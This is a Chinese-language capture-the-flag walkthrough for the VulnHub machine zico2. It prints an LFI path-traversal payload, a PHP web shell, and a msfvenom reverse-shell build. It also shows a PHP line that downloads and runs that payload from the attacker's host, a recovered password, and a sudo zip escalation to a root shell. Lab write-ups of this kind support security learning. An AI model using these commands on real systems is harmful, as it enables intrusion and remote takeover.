VulnHub-zico2: 1

靶机地址：https://www.vulnhub.com/entry/zico2-1,210/

靶机难度：中级（CTF）

靶机发布日期：2017年6月19日

靶机描述：

Zico试图建立自己的网站，但在选择要使用的CMS时遇到了一些麻烦。在尝试了一些受欢迎的方法后，他决定建立自己的方法。那是个好主意吗？

提示：枚举，枚举和枚举！

目标：得到root权限&找到flag.txt

请注意：对于所有这些计算机，我已经使用VMware运行下载的计算机。我将使用Kali Linux作为解决该CTF的攻击者机器。这里使用的技术仅用于学习教育目的，如果列出的技术用于其他任何目标，我概不负责。

一、信息收集

我们在VM中需要确定攻击目标的IP地址，需要使用nmap获取目标IP地址：

我们已经找到了此次CTF目标计算机IP地址：192.168.56.128

nmap扫到了22、80、111、50702端口是开启的...

检出Web端口：

往下翻...

点击进入...

可以看到tools.html页面的URL...可能容易受到LFI的影响....试试

尝试获取LFI并成功使用 /../../etc/passwd....这边找到了zico用户...

前面提示让我们枚举，那我就枚举爆破看看...

/dbadmin/浏览这个目录发现了test_db.php文件....访问它

可以看到一个php数据库登录页面以及版本名称....

使用默认密码admin，成功登录进来...

可以看出，这里目前我发现有三种方法可以提权...

文件上传...LFI注入...写shell在页面插入...

查看到步骤后，按照进行即可...

<?php echo system($_GET["cmd"]); ?>

可以看到php代码脚本已保存在数据库中...

二、提权

这边执行了该文件...可以看到位于www-data中....

这边思路就很简单了，先在本地创建个shell...

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.56.103 lport=4444 -f elf > shell

开启msf，我无奈的不知道为什么很简单的上传个shell上去，打开就能获得权限，可是死活就不行，我就只能求助MSF先把这台靶机拿下先，不然心态爆炸了...

<?php system("cd /tmp;wget http://192.168.56.103:8000/shell;chmod +x shell;./shell");?>

重新访问下即可...

这边成功获得权限...这边进入zico用户后，发现了wordpress目录，进去肯定有一个wp-config.php文件可以查看账号密码的...常识

sWfCsfJSPV9H3AmQzw8

ssh成功登陆...

sudo zip /tmp/nisha.zip /home/zico/raj -T --unzip-command="sh -c /bin/bash"

可以看到用户可以以root用户身份运行tar和zip命令，而无需输入任何密码...

将文件raj压缩为文件，然后将其移动到/tmp/nisha.zip文件夹，最后将其解压缩，然后弹出root壳...

成功获得root权限和找到flag.txt....

由于我们已经成功得到root权限&找到flag.txt，因此完成了简单靶机，希望你们喜欢这台机器，请继续关注大余后期会有更多具有挑战性的机器，一起练习学习。

如果你有其他的方法，欢迎留言。要是有写错了的地方，请你一定要告诉我。要是你觉得这篇博客写的还不错，欢迎分享给身边的人。